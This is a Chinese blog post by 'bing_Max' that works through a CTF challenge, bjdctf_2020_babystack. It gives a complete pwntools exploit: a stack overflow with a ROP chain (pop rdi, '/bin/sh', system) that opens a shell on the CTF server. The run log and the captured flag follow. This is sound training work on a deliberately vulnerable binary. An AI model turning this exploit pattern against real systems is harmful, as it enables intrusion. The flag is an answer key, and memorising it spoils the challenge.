CTF buuoj pwn-----第10题: bjdctf_2020_babystack
1 思路
- 本题有后门函数, 最简单的是直接调用, 又快又好.
- 这里想用一下system函数,一开始忘了本题是64位的,调用约定不同, 写了个payload_1 = b’a’*(0x10+8) + p64(system_addr)+p64(1)+p64(binsh_addr) 显然不成功
- 后来反映过来, 写了payload_1 = b’a’*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr),成功获取flag
2 编写exp
from pwn import *
context.log_level='debug'
sh = remote('node4.buuoj.cn', 26883)
elf = ELF('./bjdctf_2020_babystack')
pop_rdi_addr = 0x400833
system_addr = elf.sym['system']
binsh_addr = 0x400858
main_addr = elf.sym['main']
sh.recvuntil(b'name:\n')
payload_0= b'100'
sh.sendline(payload_0)
sh.recvuntil(b'name?\n')
payload_1 = b'a'*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr)
sh.sendline(payload_1)
sh.interactive()
3 运行exp ,获取flag
bing@bing-virtual-machine:~/pwn$ python3 ./bjdctf_2020_babystack.py
[+] Opening connection to node4.buuoj.cn on port 26883: Done
[DEBUG] Received 0xe8 bytes:
b'**********************************\n'
b'* Welcome to the BJDCTF! *\n'
b'* And Welcome to the bin world! *\n'
b"* Let's try to pwn the world! *\n"
b'* Please told me u answer loudly!*\n'
b'[+]Are u ready?\n'
b'[+]Please input the length of your name:\n'
[DEBUG] Sent 0x4 bytes:
b'100\n'
[DEBUG] Received 0x12 bytes:
b"[+]What's u name?\n"
[DEBUG] Sent 0x31 bytes:
00000000 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
00000010 61 61 61 61 61 61 61 61 33 08 40 00 00 00 00 00 │aaaa│aaaa│3·@·│····│
00000020 58 08 40 00 00 00 00 00 90 05 40 00 00 00 00 00 │X·@·│····│··@·│····│
00000030 0a │·│
00000031
[*] Switching to interactive mode
$ cat flag
[DEBUG] Sent 0x9 bytes:
b'cat flag\n'
[DEBUG] Received 0x2b bytes:
b'flag{25c317f8-0bac-4f52-84ca-0429c55a5e63}\n'
flag{25c317f8-0bac-4f52-84ca-0429c55a5e63}
版权声明:本文为bing_Max原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。